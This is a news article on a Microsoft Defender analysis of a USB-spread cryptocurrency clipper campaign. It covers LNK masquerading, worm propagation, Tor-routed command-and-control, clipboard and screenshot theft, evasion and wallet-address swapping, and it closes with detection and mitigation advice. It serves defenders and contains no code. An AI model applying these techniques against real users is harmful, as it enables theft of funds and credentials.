Microsoft has disclosed details of a Windows-based cryptocurrency clipper campaign that has targeted users since February 2026.
“The clipper in this campaign relies on Windows Script Host and ActiveX-driven logic to launch a bundled Tor proxy and poll a hidden-service C2 [command-and-control] server,” the Microsoft Defender Security Research Team said in an analysis published Tuesday. “It carries out high-frequency clipboard theft, screenshot exfiltration, and wallet-address substitution.”
“The execution of this clipper is notable because it does not depend on a traditional installer or exposed IP-based C2 infrastructure. Instead, it deploys a portable Tor client, routes traffic through a local SOCKS5 proxy, and blends data theft with remote code execution, turning a financially motivated stealer into a lightweight backdoor.”
Clipper malware refers to a type of malicious software that silently monitors a user’s clipboard and intercepts sensitive data pasted into the short-term buffer. It primarily targets cryptocurrency transactions by substituting wallet address strings that match known blockchain address patterns to reroute them to addresses under their control.
The attacks involve distributing a malicious Windows Shortcut (LNK) file via USB storage devices, opening which triggers a worm component that checks is the machine is already infected and only proceeds to fetch the payload from a remote server if it’s not present. A second module deployed is the clipper that harvests and exfiltrates cryptocurrency wallet information.
The LNK payload scans the USB device for common document types like DOC, XLSX, and PDF, and if found, hides them and creates new LNK files with the same file names and containing arguments that line to the worm component. Thus, when an unsuspecting user launches the shortcut thinking they are opening a harmless document, it triggers the execution of the malware.
The worm component, besides ensuring propagation to other uncompromised USB drives, deploys scheduled tasks as a form of persistence for both the worm component and the stealer component. The clipper, for its part, uses WScript and ActiveXObject to interact with the operating system, and exits if Task Manager is among the list of actively running processes to evade detection.
In the final stage, the malware launches a renamed Tor binary in a hidden window, generates a unique victim identifier, and registers it with the external server. Once this step is complete, the malware enters a continuous loop, periodically polling the C2 server for instructions while simultaneously monitoring the clipboard about every 500 milliseconds to extract seed phrases and private keys.
“It also hijacks cryptocurrency addresses by replacing copied wallet values with attacker-controlled alternatives and uploads screenshots through Tor,” Microsoft said. “If the C2 returns an EVAL response, the malware executes attacker-supplied code at runtime.”
The tech giant has recommended that defenders prioritize behavioral detections over static signatures, specifically looking for PowerShell-based screen capture and the use of WScript, CScript, or related script engines for launching curl, cmd.exe, PowerShell, or unexpected executables.
Other mitigations include disabling AutoRun/AutoPlay for all removable media, blocking LNK execution from removable drives via Group Policy Objects (GPOs), restricting unnecessary use of wscript.exe or cscript.exe, and review clipboard-related and screen-capture behaviors on devices handling sensitive financial workflows.
